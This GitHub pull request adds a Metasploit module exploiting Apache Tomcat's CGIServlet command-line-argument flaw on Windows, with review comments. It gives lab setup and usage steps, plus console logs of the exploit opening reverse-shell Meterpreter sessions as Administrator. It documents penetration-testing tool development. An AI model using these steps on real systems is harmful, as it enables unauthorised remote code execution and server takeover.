Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability #11990

Merged
merged 6 commits into from Jul 1, 2019

Conversation

Projects
None yet
4 participants
@wchen-r7
Copy link
Contributor

commented Jun 18, 2019

Description

This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.

Setup

Prepare a Windows box with JDK8 on it. You also want to make sure the box has the JAVA_HOME environment variable configured. For example:

JAVA_HOME=C:\Program Files\Java\jdk1.8.0_211

To help you speed up the process, I have uploaded the actual vulnerable tomcat setup that you can use:
apache-tomcat-9.0.17.zip

To use it, simply download and extract it on the Windows machine. Go to the bin directory and execute the startup.bat file.

Note that I also created a debugging port for this tomcat on 4000, so if you want, you can attach IntelliJ and observe the tomcat internals more for analysis reasons.

The cgi script should be located at: http://IP:8080/cgi/test.bat

Verification

  • Start msfconsole
  • Use windows/http/tomcat_cgi_cmdlineargs
  • Set RHOSTS
  • Start TARGETURI (if you're using the tomcat I uploaded, it should be /cgi/test.bat)
  • Set a payload
  • Run the module, you should get a session.

Demo:

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 172.16.135.141:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Checking if 172.16.135.141 is vulnerable
[*] 172.16.135.141 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 172.16.135.141
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.141:52004) at 2019-06-18 15:39:42 -0500
[*] Command Stager progress - 100.02% done (100692/100668 bytes)

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 19, 2019

I wouldn't mind taking this one,if you had someone else in mind or it was a priority feel free to replace me.
My Windows 2012 VM is missing a vmdk, so I'll have to rebuild it. Should have this done over the weekend if not sooner!

@h00die h00die self-assigned this Jun 19, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

commented Jun 19, 2019

Not a priority. Please take your time. Thanks!

* 8.5.0 to 8.5.39
* 7.0.0 to 7.0.93

Also, the machine needs to enable the enableCmdLineArguments option in web.xml. For example:

This comment has been minimized.

Copy link
@h00die

h00die Jun 21, 2019

Contributor

conf\web.xml (i like to wrap file names and paths in ticks)

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 24, 2019

https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/ mentions:

3. Modify the conf\context.xml file on line 19, to enable privileged context:

<Context privileged="true">

Your bundle also includes that change. I attempted exploit against my own custom install and its failing (most likely a typo or user error on my behalf), but that instruction wasn't in the docs, but is required right?

@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

commented Jun 24, 2019

Yes I have that set to true.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

Your bundle worked, still trying to figure out why my manual didn't (so the docs can be adjusted if need be)

msf5 > use exploit/windows/http/tomcat_cgi_cmdlineargs 
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set rport 8080
rport => 8080
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > show options

Module options (exploit/windows/http/tomcat_cgi_cmdlineargs):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     2.2.2.2    yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path to CGI script
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Apache Tomcat 9.0 or prior for Windows


msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi/test.bat
targeturi => /cgi/test.bat
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49562) at 2019-06-24 20:13:03 -0400

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit

meterpreter > sysinfo
Computer        : WIN-SRV2012
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 1272 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-9.0.17\apache-tomcat-9.0.17\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-9.0.17\apache-tomcat-9.0.17"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-9.0.17\apache-tomcat-9.0.17"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-9.0.17\apache-tomcat-9.0.17\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-9.0.17\apache-tomcat-9.0.17\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-9.0.17\apache-tomcat-9.0.17\bin\tomcat-juli.jar"
Server version: Apache Tomcat/9.0.17
Server built:   Mar 13 2019 15:55:27 UTC
Server number:  9.0.17.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

worked on 8.5.20 as well on my server 2012 box.

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2019-06-24 20:44:19 -0400  %SystemDrive%
100777/rwxrwxrwx  73802  fil   2019-06-24 20:44:19 -0400  dKASF.exe
100777/rwxrwxrwx  67     fil   2019-06-20 21:52:49 -0400  example.bat
100777/rwxrwxrwx  69     fil   2019-06-24 15:15:13 -0400  test.bat

meterpreter > sysinfo
Computer        : WIN-EDKFSE5QPAB
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built:   Aug 2 2017 21:35:49 UTC
Server number:  8.5.20.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>

@h00die
Copy link
Contributor

left a comment

exploit working, some minor doc cleanups

Show resolved Hide resolved documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md Outdated
6. Run the module, you should get a session.

## Scenarios

This comment has been minimized.

Copy link
@h00die

h00die Jun 25, 2019

Contributor

### Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)


* Windows 10 Pro (x64)
* Apache Tomcat 9.0.17
* JDK 8

This comment has been minimized.

Copy link
@h00die

h00die Jun 25, 2019

Contributor

remove this addition infavor of the h3 commented above

* Apache Tomcat 9.0.17
* JDK 8

### Check Method

This comment has been minimized.

Copy link
@h00die

h00die Jun 25, 2019

Contributor

add an extra #

[+] 172.16.135.141:8080 - The target is vulnerable.
```

### Code Execution

This comment has been minimized.

Copy link
@h00die

h00die Jun 25, 2019

Contributor

Add an extra #

Show resolved Hide resolved documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md Outdated
Show resolved Hide resolved documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
```

This comment has been minimized.

Copy link
@h00die

h00die Jun 25, 2019

Contributor

Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2019-06-24 20:44:19 -0400  %SystemDrive%
100777/rwxrwxrwx  73802  fil   2019-06-24 20:44:19 -0400  dKASF.exe
100777/rwxrwxrwx  67     fil   2019-06-20 21:52:49 -0400  example.bat
100777/rwxrwxrwx  69     fil   2019-06-24 15:15:13 -0400  test.bat

meterpreter > sysinfo
Computer        : WIN-EDKFSE5QPAB
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built:   Aug 2 2017 21:35:49 UTC
Server number:  8.5.20.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>
Show resolved Hide resolved modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb Outdated
@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

commented Jun 25, 2019

Ok. Awesome. I'll make the changes today. Thanks for testing!

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 29, 2019

There's a few minor doc things, but honestly it'll take me less time to change it when landing. Should be able to wrap this up over the weekend!

@h00die h00die merged commit b59fd43 into rapid7:master Jul 1, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

h00die added a commit that referenced this pull request Jul 1, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jul 1, 2019

Release Notes

This PR adds an exploit for Apache Tomcat on Windows when the cmdlineargs is configured (non-default)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.